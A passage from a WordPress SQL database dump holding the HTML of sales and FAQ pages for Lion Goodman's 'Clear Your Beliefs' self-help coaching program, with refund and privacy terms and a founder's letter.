Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs-bk', '', 'publish', 'closed', 'closed', '', 'clear-your-beliefs-3', '', '', '2014-06-26 16:44:08', '2014-06-26 21:44:08', '', 0, 'http://clearyourbeliefs.com/?page_id=915', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1040, 2, '2014-06-19 01:43:37', '2014-06-19 06:43:37', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined 